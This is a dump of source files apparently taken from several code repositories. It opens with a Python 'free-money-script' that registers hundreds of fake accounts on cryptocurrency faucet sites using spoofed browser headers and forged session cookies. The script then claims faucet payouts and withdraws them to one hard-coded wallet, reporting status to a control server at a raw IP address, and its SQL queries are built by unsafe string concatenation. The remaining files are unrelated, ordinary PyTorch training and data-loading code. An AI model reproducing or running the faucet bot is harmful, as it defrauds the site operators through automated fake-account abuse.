'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://byteminer.live/withdrawal',
'accept-language': 'en-US,en;q=0.9',
'cookie': rememberCode + "; " + ci_session
}
conn.request("POST", "/withdrawal", payload, headers)
res = conn.getresponse()
data = res.read()
if(withdrawCompletely):
URL = "http://20.198.178.250:3000/update-address/"+address+"/Complete"
requests.get(url = URL)
else:
URL = "http://20.198.178.250:3000/update-address/"+address+"/Withdraw"
requests.get(url = URL)
print("---")
print("Address : " + address)
print("Current User : " + current_user_address)
print("Valid : " + str(address == current_user_address))
print("Withdraw Success : " + balance)
print("---")
end_at = datetime.now()
diff = end_at- start_at
print("Finish in " + (str(diff.microseconds/1000)) + "ms")
print("################")
def run_main_thread(args):
try:
main(args)
except:
exit()
f = open("status.txt", "w")
f.write("1")
f.close()
threadCount = 1
if(threadCount>1):
for i in range(threadCount):
t = threading.Thread(target=main, args=(i,))
t.start()
else:
main(0)
```
#### File: 5lineofcode/free-money-script/script.py
```python
import http.client
import requests
import random
import string
import sqlite3
from sqlite3 import Error
import sys
from faker import Faker
fake = Faker()
withdraw = False
address = "D87S8xBmWjgy6UWUhBjeRs8cMjpMyXdQe5"
db = sqlite3.connect('database.db')
conn = http.client.HTTPSConnection("dogeminer.fun")
def query(sql):
cursor = db.cursor()
res = cursor.execute(sql)
db.commit()
return res
def getSession():
length_of_string = 40
letters_and_digits = string.ascii_lowercase + string.digits
random_string = ""
for _ in range(length_of_string):
random_string += random.choice(letters_and_digits)
print(random_string)
ci_session = "wolven_core_session=" + random_string
return ci_session
def getAddress():
URL = "http://localhost:3000/get-target-linked-address"
r = requests.get(url = URL)
data = r.json()
address = data['data']
return address.strip()
def register(username,address):
session_id = getSession()
payload = 'user_name='+username+'&email='+username+'%40gmail.com&email_repeat='+username+'%40gmail.com&password=<PASSWORD>&password_repeat=<PASSWORD>&address='+address+'&tos_agree=1®ister=Register%2BSecurely'
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://dogeminer.fun',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/account/register',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("POST", "/account/register", payload, headers)
res = conn.getresponse()
data = res.read()
print(data)
print(res.status)
if("Your account was successfully created" in str(data)):
print("Register Success : " + username)
query("insert into dogeminner_address (username,address,status) values('"+username+"','"+address+"','Pending')")
def withdraw_doge(username):
session_id = getSession()
payload = 'user_name='+username+'&password=<PASSWORD>&login=Login%2BSecurely'
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://dogeminer.fun',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/account/login',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("POST", "/account/login", payload, headers)
res = conn.getresponse()
res.read()
payload = 'claim=Start%2BAuto%2BFaucet'
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://dogeminer.fun',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/page/dashboard',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("POST", "/page/dashboard", payload, headers)
res = conn.getresponse()
res.read()
redirectUrl = res.headers['Location']
print("RedirectUrl: " + str(redirectUrl))
payload = ''
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/page/dashboard',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("GET", redirectUrl, payload, headers)
res = conn.getresponse()
res.read()
print("Withdraw Complete for User : " + username)
def initialize():
sql = """ CREATE TABLE IF NOT EXISTS dogeminner_address (
id integer PRIMARY KEY ,
username text,
address text,
status text
); """
query(sql)
res = query("select count(*) as count from dogeminner_address")
rows = res.fetchall()
data_count = rows[0][0]
min_data_count = 500
if(data_count < min_data_count):
for _ in range(min_data_count-data_count):
name = fake.name().split(" ")[1]
number = '{:03d}'.format(random.randrange(1, 999))
username = (name + number)
register(username,address)
def do_main_job():
cursor = db.cursor()
sql = "select username from dogeminner_address where status = 'Pending' LIMIT 1"
res = cursor.execute(sql)
rows = res.fetchall()
if(len(rows)==0):
sql = "update dogeminner_address set status = 'Pending'"
res = cursor.execute(sql)
db.commit()
do_main_job()
return
username = rows[0][0]
sql = "update dogeminner_address set status = 'Completed' where username = '"+username+"'"
res = cursor.execute(sql)
db.commit()
withdraw_doge(username)
do_main_job()
initialize()
do_main_job()
``` |
{
"source": "5loaves-2fish-12basckets/ADF_studies",
"score": 3
} |
#### File: 01inspections/module/datafunc.py
```python
from torch.utils import data
from torchvision import datasets
from torchvision import transforms
def MNIST(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.MNIST(
data_dir_root, train=True, download=False, transform=trans
)
return dataset
def make_dataloader(data_dir_root, img_size, batch_size):
trainset = MNIST(data_dir_root, img_size)
testset = prepare_dataset(img_size)
trainloader = data.DataLoader(trainset, batch_size=batch_size, shuffle=True)
testloader = data.DataLoader(testset, batch_size=batch_size, shuffle=False)
return trainloader, testloader
def prepare_dataset(img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.Grayscale(num_output_channels=1),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
# trainset = datasets.ImageFolder('/home/jimmy/datastore/fonts/', transform=trans)
testset = datasets.ImageFolder('/home/jimmy/datastore/fonts/digit', transform=trans)
return testset
'''
previous
import numpy as np
import pandas as pd
import glob
from torch.utils import data
from torchvision import datasets
from torchvision import transforms
from torch.utils.data.sampler import SubsetRandomSampler
#main function to be called
def make_dataloader(data_dir_root, img_size, batch_size):
trainset, testset = read_data
trainloader = data.DataLoader(trainset, batch_size=batch_size, shuffle=True)
testloader = data.DataLoader(testset, batch_size=batch_size, shuffle=True)
if datatype=='mnist':
dataset = MNIST(data_dir_root, img_size)
return data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
elif datatype=='lsun':
dataset = LSUN(data_dir_root, img_size)
return data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
elif datatype=='celeba':
dataset = CELEBA(data_dir_root, img_size)
return data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
def rearrange_data()
def read_data(data_dir_root)
for file in glob.glob(data_dir_root+'/font/*.csv')
testdata = []
traindata = []
df = pd.read_csv(file)
for i in len(df):
values = df.loc[i].values
# font = values[0]
ascii_code = values[2]
# bold_val = values[3] # normal 0 -> bold 1
# italic = values[4]
array = values[12:]
if i%6==0:
testdata.append((ascii_code, array))
else:
traindata.append((ascii_code, array))
trainset = dataset(traindata)
testset = dataset
class dataset(data.Dataset):
def __init__(self, data):
self.data = data
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return self.data[idx]
class Font(data.Dataset):
def __init__(self, data_dir_root, img_size):
self.DATA = []
# ['TW.csv', 'MONOTXT.csv', 'BERLIN.csv', 'HAETTENSCHWEILER.csv', 'HIMALAYA.csv', 'PHAGSPA.csv',
# 'NIRMALA.csv', 'BERNARD.csv', 'KRISTEN.csv', 'CENTURY.csv', 'MONOSPAC821.csv', 'VIVALDI.csv',
# 'ARIAL.csv', 'FORTE.csv', 'JUICE.csv', 'HARRINGTON.csv', 'BUXTON.csv', 'ROCKWELL.csv', 'CHILLER.csv',
# 'CURLZ.csv', 'TECHNIC.csv', 'PLAYBILL.csv', 'COUNTRYBLUEPRINT.csv', 'IMPRINT.csv', 'NINA.csv',
# 'HARLOW.csv', 'COOPER.csv', 'EDWARDIAN.csv', 'ONYX.csv', 'LUCIDA.csv', 'GADUGI.csv', 'COMIC.csv',
# 'CAARD.csv', 'BAITI.csv', 'ROMANTIC.csv', 'HANDPRINT.csv', 'FELIX TITLING.csv', 'SKETCHFLOW.csv',
# 'BROADWAY.csv', 'MONEY.csv', 'CASTELLAR.csv', 'GLOUCESTER.csv', 'DUTCH801.csv', 'SNAP.csv', 'VERDANA.csv',
# 'RAVIE.csv', 'TAI.csv', 'CENTAUR.csv', 'WIDE.csv', 'CONSTANTIA.csv', 'VINETA.csv', 'LEELAWADEE.csv',
# 'ELEPHANT.csv', 'COMPLEX.csv', 'CREDITCARD.csv', 'MV_BOLI.csv', 'SHOWCARD.csv', 'TREBUCHET.csv',
# 'PALACE.csv', 'GABRIOLA.csv', 'MODERN.csv', 'GEORGIA.csv', 'BOOK.csv', 'GOUDY.csv', 'NUMERICS.csv',
# 'E13B.csv', 'MISTRAL.csv', 'SWIS721.csv', 'GILL.csv', 'GOTHICE.csv', 'MAGNETO.csv', 'CANDARA.csv',
# 'BITSTREAMVERA.csv', 'RAGE.csv', 'EBRIMA.csv', 'CALIBRI.csv', 'STYLUS.csv', 'PANROMAN.csv',
# 'BASKERVILLE.csv', 'BRITANNIC.csv', 'VINER.csv', 'GARAMOND.csv', 'STENCIL.csv', 'ITALIC.csv',
# 'FRENCH.csv', 'JAVANESE.csv', 'ISOC.csv', 'SERIF.csv', 'COURIER.csv', 'BAUHAUS.csv', 'MAIANDRA.csv',
# 'TAHOMA.csv', 'COPPERPLATE.csv', 'FOOTLIGHT.csv', 'KUNSTLER.csv', 'ROMAN.csv', 'PRISTINA.csv',
# 'SANSSERIF.csv', 'SCRIPTB.csv', 'BRUSH.csv', 'MATURA.csv', 'PERPETUA.csv', 'CITYBLUEPRINT.csv',
# 'SCRIPT.csv', 'PAPYRUS.csv', 'SYLFAEN.csv', 'QUICKTYPE.csv', 'CONSOLAS.csv', 'CALIFORNIAN.csv',
# 'GUNPLAY.csv', 'INFORMAL.csv', 'ERAS.csv', 'OCRB.csv', 'MYANMAR.csv', 'RICHARD.csv',
# 'COMMERCIALSCRIPT.csv', 'PALATINO.csv', 'TEMPUS.csv', 'TXT.csv', 'JOKERMAN.csv', 'SEGOE.csv',
# 'SIMPLEX.csv', 'ENGRAVERS.csv', 'BANKGOTHIC.csv', 'FREESTYLE.csv', 'PMINGLIU-EXTB.csv',
# 'VLADIMIR.csv', 'REFERENCE.csv', 'GIGI.csv', 'BODONI.csv', 'BELL.csv', 'OCRA.csv', 'CAMBRIA.csv',
# 'HIGH TOWER.csv', 'IMPACT.csv', 'VIN.csv', 'AGENCY.csv', 'SITKA.csv', 'BRADLEY.csv', 'PROXY.csv',
# 'FRANKLIN.csv', 'ENGLISH.csv', 'SUPERFRENCH.csv', 'MINGLIU.csv', 'NIAGARA.csv', 'CALISTO.csv',
# 'MONOTYPE.csv', 'BLACKADDER.csv', 'CORBEL.csv', 'YI BAITI.csv', 'TIMES.csv', 'BOOKMAN.csv',
# 'EUROROMAN.csv']
class FaceLandmarksDataset(data.Dataset):
"""Face Landmarks dataset."""
def __init__(self, csv_file, root_dir, transform=None):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.landmarks_frame = pd.read_csv(csv_file)
self.root_dir = root_dir
self.transform = transform
def __len__(self):
return len(self.landmarks_frame)
def __getitem__(self, idx):
img_name = os.path.join(self.root_dir,
self.landmarks_frame.iloc[idx, 0])
image = io.imread(img_name)
landmarks = self.landmarks_frame.iloc[idx, 1:].as_matrix()
landmarks = landmarks.astype('float').reshape(-1, 2)
sample = {'image': image, 'landmarks': landmarks}
if self.transform:
sample = self.transform(sample)
return sample
#list of datasets to use
def MNIST(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.MNIST(
data_dir_root, train=True, download=True, transform=trans
)
return dataset
def LSUN(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
classes = ['bedroom_train']
dataset = datasets.LSUN(
data_dir_root+'/LSUN',classes=classes, transform=trans
)
return dataset
def CELEBA(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
dataset = datasets.ImageFolder(
data_dir_root+'/CELEBA',trans
)
return dataset
'''
```
#### File: resource/pytorch-adversarial_box-master/models.py
```python
import torch
import torch.nn as nn
class LeNet5(nn.Module):
def __init__(self):
super(LeNet5, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=3, padding=1, stride=1)
self.relu1 = nn.ReLU(inplace=True)
self.maxpool1 = nn.MaxPool2d(2)
self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1, stride=1)
self.relu2 = nn.ReLU(inplace=True)
self.maxpool2 = nn.MaxPool2d(2)
self.linear1 = nn.Linear(7*7*64, 200)
self.relu3 = nn.ReLU(inplace=True)
self.linear2 = nn.Linear(200, 10)
def forward(self, x):
out = self.maxpool1(self.relu1(self.conv1(x)))
out = self.maxpool2(self.relu2(self.conv2(out)))
out = out.view(out.size(0), -1)
out = self.relu3(self.linear1(out))
out = self.linear2(out)
return out
class SubstituteModel(nn.Module):
def __init__(self):
super(SubstituteModel, self).__init__()
self.linear1 = nn.Linear(28*28, 200)
self.relu1 = nn.ReLU(inplace=True)
self.linear2 = nn.Linear(200, 200)
self.relu2 = nn.ReLU(inplace=True)
self.linear3 = nn.Linear(200, 10)
def forward(self, x):
out = x.view(x.size(0), -1)
out = self.relu1(self.linear1(out))
out = self.relu2(self.linear2(out))
out = self.linear3(out)
return out
```
#### File: 87transfer/module/addatrainer.py
```python
from dann_module.addamodel2 import ADDA
from dann_module.datafunc import make_dataloaders
from tqdm import tqdm
import torch
import os
from math import sqrt
torch.manual_seed(7)
torch.cuda.manual_seed_all(100)
torch.backends.cudnn.deterministic = True
class Trainer():
def __init__(self, args):
self.model = ADDA()
self.optimizer = torch.optim.Adam(
list(self.model.encoder.parameters()) \
+ list(self.model.classifier.parameters()),
lr=1e-3, betas=(0.5, 0.9)
)
self.ten_optimizer = torch.optim.Adam(self.model.tencoder.parameters(),
lr=1e-4, betas=(0.5, 0.9))
self.tel_optimizer = torch.optim.Adam(self.model.teller.parameters(),
lr=1e-4, betas=(0.5, 0.9))
self.criterion = torch.nn.CrossEntropyLoss()
dataloaders = make_dataloaders(args.source, args.target, args.batch_size)
self.sourceloader, self.targetloader, self.testtargetloader = dataloaders
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.model.to(self.device)
self.criterion.to(self.device)
self.args = args
self.modelpath = os.path.join('ckpt', args.taskname, 'model_%s.pth'%(args.target[:2]))
self.bestpath = os.path.join('ckpt', args.taskname, 'best_%s.pth'%(args.target[:2]))
self.pretrain_path = os.path.join('ckpt', args.taskname, 'pre_%s.pth'%(args.source[:2]))
self.tarstep = 1
def train(self):
print('%s --> %s'%(self.args.source, self.args.target))
if os.path.exists(self.pretrain_path):
self.model.load_pretrain(self.pretrain_path)
else:
self.pretrain()
self.model.target_load_source()
self.adapt_target()
print()
def pretrain(self):
self.model.encoder.train()
self.model.classifier.train()
# bbar = tqdm(range(100), ncols=100, desc='pretrain')
bbar = tqdm(range(self.args.epochs), ncols=100, desc='pretrain')
for epoch in bbar:
pbar = tqdm(self.sourceloader, ncols=100, desc='tr '+str(epoch))
accuracy = 0
length = 0
for img, label in pbar:
img, label = img.to(self.device), label.to(self.device)
self.optimizer.zero_grad()
output = self.model(img)
loss = self.criterion(output, label)
loss.backward()
self.optimizer.step()
acc = output.argmax(1).eq(label).sum()*100//len(label)
accuracy += output.argmax(1).eq(label).sum().item()
length += len(label)
pbar.set_postfix(loss=loss.item(), acc=acc.item())
accuracy = accuracy * 100 / length
bbar.set_postfix(acc=accuracy)
self.model.save(self.pretrain_path)
def adapt_target(self):
self.model.tencoder.train()
self.model.teller.train()
num_iteration = min(len(self.sourceloader), len(self.targetloader))
bbar = tqdm(range(500), ncols=100, desc='adapt')
# bbar = tqdm(range(self.args.epochs), ncols=100, desc='adapt')
best_acc = 0
for epoch in bbar:
total_acc=0
length=0
target_acc=0
tlength=0
pbar = tqdm(range(num_iteration), ncols=100, desc='ada '+str(epoch))
for i in pbar:
simg, __ = next(iter(self.sourceloader))
timg, __ = next(iter(self.targetloader))
simg, timg = simg.to(self.device), timg.to(self.device)
batch_size = len(simg)
# train teller
self.tel_optimizer.zero_grad()
source_feature = self.model.encoder(simg)
target_feature = self.model.tencoder(timg)
concat_feature = torch.cat((source_feature, target_feature), 0)
concat_dom = self.model.teller(concat_feature.detach())
source_lab = torch.ones(batch_size).long().to(self.device)
target_lab = torch.zeros(batch_size).long().to(self.device)
concat_lab = torch.cat((source_lab, target_lab), 0)
tell_loss = self.criterion(concat_dom, concat_lab)
tell_loss.backward()
self.tel_optimizer.step()
afloat = concat_dom.argmax(1).eq(concat_lab).float()
acc = afloat.mean().item()
total_acc += afloat.sum().item()
length += len(afloat)
## train tencoder
for __ in range(self.tarstep):
self.ten_optimizer.zero_grad()
self.tel_optimizer.zero_grad()
target_feature = self.model.tencoder(timg)
target_dom = self.model.teller(target_feature)
target_lab = torch.ones(batch_size).long().to(self.device)
targ_loss = self.criterion(target_dom, target_lab)
targ_loss.backward()
self.ten_optimizer.step()
bfloat = target_dom.argmax(1).eq(target_lab).float()
tacc = bfloat.mean().item()
target_acc+= bfloat.sum().item()
tlength+= len(bfloat)
pbar.set_postfix(teller=acc, target=tacc)
if 0.3 < tacc < 0.4:
self.tarstep = 2
elif 0.2 < tacc < 0.3:
self.tarstep = 3
elif 0.15 < tacc < 0.2:
self.tarstep = 4
elif 0.1 < tacc < 0.15:
self.tarstep = 5
elif tacc < 0.1:
self.tarstep = 6
else:
self.tarstep = 1
total_acc = total_acc * 100 / length ## total domain accuracy
target_acc = target_acc * 100 / tlength
acc, loss = self.test()
if acc>best_acc:
best_acc=acc
self.model.save(self.bestpath)
self.model.save(self.modelpath)
bbar.set_postfix(acc=acc, best_acc=best_acc, tar=target_acc, tel=total_acc)
def test(self):
self.model.eval()
loss = 0
acc = 0
length = 0
pbar = tqdm(self.testtargetloader, ncols=100, desc='test')
for images, labels in pbar:
images, labels = images.to(self.device), labels.to(self.device)
output = self.model(images, mode='target')
loss += self.criterion(output, labels).item()
pred = output.argmax(1)
acc += pred.eq(labels).sum().item()
length += len(labels)
loss /= length
acc /= length
return acc, loss
```
#### File: 87transfer/module/datafunc.py
```python
import torch
import torchvision
from PIL import Image
import os
import csv
# data_root = 'hw3_data/digits'
# dir_list = ['mnistm', 'svhm', 'usps']
class Dataset(torch.utils.data.Dataset):
def __init__(self, data_root='hw3_data/digits', data_name='mnistm', transform=None, train=True):
folder = 'train' if train else 'test'
self.dir = os.path.join(data_root, data_name, folder)
self.labelpath = os.path.join(data_root, data_name, folder+'.csv')
example_filename = os.listdir(self.dir)[0].split('/')[-1].split('.')[0]
self.k = len(str(example_filename))
self.length = len(os.listdir(self.dir))
self.str_ = lambda i: '0' * (self.k - len(str(i))) + str(i)
self._readlabel()
self.trans = torchvision.transforms.ToTensor()
def __len__(self):
return self.length
def __getitem__(self, index):
imgfile = '%s.png'%self.str_(index)
label = self.labeldict[imgfile]
label = torch.LongTensor([label]).squeeze()
imgpath = os.path.join(self.dir, imgfile)
img = Image.open(imgpath)
img = self.trans(img)
img = img.expand(3, 28, 28)
return img, label
def _readlabel(self):
self.labeldict = {}
with open(self.labelpath, newline='') as f:
reader = csv.reader(f)
first = True
for row in reader:
if first:
first = False
else:
self.labeldict[row[0]]=int(row[1])
def make_dataloaders(source, target, batch_size):
sourceset = Dataset(data_name=source, train=True)
sourcetestset = Dataset(data_name=source, train=False)
targetset = Dataset(data_name=target, train=True)
targettestset = Dataset(data_name=target, train=False)
sourceloader = torch.utils.data.DataLoader(sourceset, batch_size=batch_size, shuffle=True)
sourcetestloader = torch.utils.data.DataLoader(sourcetestset, batch_size=batch_size, shuffle=False)
targetloader = torch.utils.data.DataLoader(targetset, batch_size=batch_size, shuffle=True)
targettestloader = torch.utils.data.DataLoader(targettestset, batch_size=batch_size, shuffle=False)
return sourceloader, sourcetestloader, targetloader, targettestloader
def make_loader(source):
dset = Dataset(data_name=source, train=False)
loader = torch.utils.data.DataLoader(dset, batch_size=1, shuffle=True)
return loader
def mnist_dataloaders(batch_size):
trans = torchvision.transforms.ToTensor()
sourceset = torchvision.datasets.MNIST('/home/jimmy/dataset/mnist', train=True, download=False, transform=trans)
targetset = Dataset(data_name='mnistm', train=True)
testtargetset = Dataset(data_name='mnistm', train=False)
sourceloader = torch.utils.data.DataLoader(sourceset, batch_size=batch_size, shuffle=True)
targetloader = torch.utils.data.DataLoader(targetset, batch_size=batch_size, shuffle=True)
testtargetloader = torch.utils.data.DataLoader(testtargetset, batch_size=batch_size, shuffle=False)
return sourceloader, targetloader, testtargetloader
class Singleset(torch.utils.data.Dataset):
def __init__(self, data_dir):
self.filelist = os.listdir(data_dir)
self.length = len(self.filelist)
self.trans = torchvision.transforms.ToTensor()
self.data_dir = data_dir
def __len__(self):
return self.length
def __getitem__(self, index):
imgname = self.filelist[index]
imgpath = os.path.join(self.data_dir, imgname)
img = Image.open(imgpath)
img = self.trans(img)
return img, imgname
def make_a_dataloader(data_dir):
singleset = Singleset(data_dir)
singleloader = torch.utils.data.DataLoader(singleset, batch_size=128, shuffle=False)
return singleloader
if __name__ == '__main__':
import sys
sys.path.append('.')
domain_list = ['usps', 'mnistm', 'svhn', 'usps']
for i in range(3):
source = domain_list[i]
target = domain_list[i+1]
print(source, target)
loader1, loader2, loader3 = make_dataloaders(source, target, 128)
for loader in [loader1, loader2, loader3]:
for image, label in loader:
print(image.shape)
print(label.shape)
print(label)
break
print('-====-====-====-')
loader = make_a_dataloader('hw3_data/digits/mnistm/test')
for image, name in loader:
print(name)
print(image.shape)
break
## usps 1 --> 3
```
#### File: 87transfer/module/dsntrainer.py
```python
from dann_module.dsnmodel import DSN, MSE, scale_inv_MSE, DifferenceLoss
from dann_module.datafunc import make_dataloaders, mnist_dataloaders
import torch
from tqdm import tqdm
import numpy as np
import os
torch.manual_seed(7)
torch.cuda.manual_seed_all(100)
torch.backends.cudnn.deterministic = True
class training_options(object):
def __init__(self):
self.lr = 0.01
self.step_decay_weight = 0.95
self.lr_decay_step = 20000
# self.activate_domain_loss_step = 1000
self.activate_domain_loss_step = 10000
self.activate_domain_epoch = 5
self.weight_decay = 1e-6
self.alpha_weight = 0.01
# self.beta_weight = 0.1
self.beta_weight = 0.075
self.gamma_weight = 0.25
# self.gamma_weight = 1
self.momentum = 0.9
def lr_scheduler(self, optimizer, step):
current_lr = self.lr * (self.step_decay_weight ** (step / self.lr_decay_step))
if step % self.lr_decay_step == 0:
print('learning rate is set to %f'%current_lr)
for param_group in optimizer.param_groups:
param_group['lr'] = current_lr
return optimizer
class Trainer():
def __init__(self, args):
args.z_dim = 100
args.n_classes = 10
self.model = DSN(args)
# self.optimizer = torch.optim.Adam(self.model.parameters())
self.class_loss = torch.nn.CrossEntropyLoss()
self.rec_loss = MSE()
self.rec_loss2 = scale_inv_MSE()
self.diff_loss = DifferenceLoss()
self.simi_loss = torch.nn.CrossEntropyLoss()
dataloaders = make_dataloaders(args.source, args.target, args.batch_size)
# dataloaders = mnist_dataloaders(args.batch_size)
self.sourceloader, self.targetloader, self.testtargetloader = dataloaders
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
object_list = [self.model, self.class_loss, self.rec_loss, self.rec_loss2, self.diff_loss, self.simi_loss]
for object_ in object_list:
object_.to(self.device)
# for parameter in self.model.parameters():
# parameter.requires_grad = True
self.args = args
self.modelpath = os.path.join('ckpt', args.taskname, 'model_%s.pth'%args.target[:2])
self.bestpath = os.path.join('ckpt', args.taskname, 'best_%s.pth'%args.target[:2])
print(self.modelpath)
print(self.bestpath)
self.opt = training_options()
self.optimizer = torch.optim.SGD(self.model.parameters(),
lr=self.opt.lr,
momentum=self.opt.momentum,
weight_decay=self.opt.weight_decay)
def train(self):
print('%s --> %s'%(self.args.source, self.args.target))
best_acc = 0
step = 0
bbar = tqdm(range(self.args.epochs), ncols=100)
# for epoch in range(self.args.epochs):
for epoch in bbar:
self.model.train()
step = self.train_one_epoch(epoch, step)
self.model.eval()
acc = self.test()
torch.save(self.model.state_dict(), self.modelpath)
if acc > best_acc:
best_acc = acc
torch.save(self.model.state_dict(), self.bestpath)
bbar.set_postfix(acc=acc, best_acc=best_acc)
def train_one_epoch(self, epoch, step):
num_iteration = min(len(self.sourceloader), len(self.targetloader))
dann_epoch = int(self.opt.activate_domain_loss_step / num_iteration)
pbar = tqdm(range(num_iteration), ncols=100, desc=str(epoch))
for i in pbar:
#train with target data
self.model.zero_grad()
loss=0
timg, __ = next(iter(self.targetloader))
timg = timg.to(self.device)
batch_size = len(timg)
domain_label = torch.ones(batch_size).long().to(self.device)
dom_acc = 0
sdom_acc = 0
alpha=0
p=0
# if step > self.opt.activate_domain_loss_step:
if epoch > self.opt.activate_domain_epoch:
dann_epoch = self.opt.activate_domain_epoch
p = float(i + (epoch - dann_epoch) * num_iteration) / (self.args.epochs - dann_epoch) / num_iteration
alpha = 2. / (1. + np.exp(-10 * p)) - 1
result = self.model(timg, mode='target', alpha=alpha)
targ_priv_code, targ_share_code, targ_dom_lab, targ_rec = result
target_dann = self.opt.gamma_weight * self.simi_loss(targ_dom_lab, domain_label)
dom_acc = targ_dom_lab.argmax(1).eq(domain_label).float().mean().item()
loss += target_dann
else:
target_dann = torch.zeros(1) # just to fill place
result = self.model(timg, mode='target')
targ_priv_code, targ_share_code, __, targ_rec = result
targ_diff = self.opt.beta_weight * self.diff_loss(targ_priv_code, targ_share_code)
# targ_mse = self.opt.alpha_weight * self.rec_loss(targ_rec, timg)
targ_simse = self.opt.alpha_weight * self.rec_loss2(targ_rec, timg)
loss += (targ_diff + targ_simse)
# loss += (targ_diff + targ_mse + targ_simse)
# self.optimizer.zero_grad()
loss.backward(retain_graph=True)
# loss_t = loss.item()
self.optimizer.step()
# train with source data
self.model.zero_grad()
loss = 0
simg, slabel = next(iter(self.sourceloader))
simg, slabel = simg.to(self.device), slabel.to(self.device)
batch_size = len(simg)
domain_label = torch.zeros(batch_size).long().to(self.device)
# if step > self.opt.activate_domain_loss_step:
if epoch > self.opt.activate_domain_epoch:
result = self.model(simg, mode='source', alpha=alpha)
sour_priv_code, sour_share_code, sour_dom_lab, class_label, sour_rec = result
source_dann = self.opt.gamma_weight * self.simi_loss(sour_dom_lab, domain_label)
sdom_acc = sour_dom_lab.argmax(1).eq(domain_label).float().mean().item()
loss += source_dann
else:
source_dann = torch.zeros(1)
result = self.model(simg, mode='source')
sour_priv_code, sour_share_code, __, class_label, sour_rec = result
class_ = self.class_loss(class_label, slabel)
sour_diff = self.opt.beta_weight * self.diff_loss(sour_priv_code, sour_share_code)
# sour_mse = self.opt.alpha_weight * self.rec_loss(sour_rec, simg)
sour_simse = self.opt.alpha_weight * self.rec_loss2(sour_rec, simg)
loss += (class_ + sour_diff + sour_simse)
# loss=class_
# loss += (class_ + sour_diff + sour_mse + sour_simse)
# print('code?')
# print(sour_priv_code[0][:10])
# print(sour_share_code[0][:10])
#
# print(class_label.shape)
# print(class_label[0])
# print(class_label.argmax(dim=1).cpu().numpy())
# print(slabel)
# input()
class_acc = class_label.argmax(1).eq(slabel).sum().item()*100//len(slabel)
# self.optimizer.zero_grad()
loss.backward(retain_graph=True)
self.optimizer.step()
step += 1
pbar.set_postfix(acc=class_acc, sda=sdom_acc, tda=dom_acc, alpha=alpha, p=p)
return step
def test(self):
correct = 0
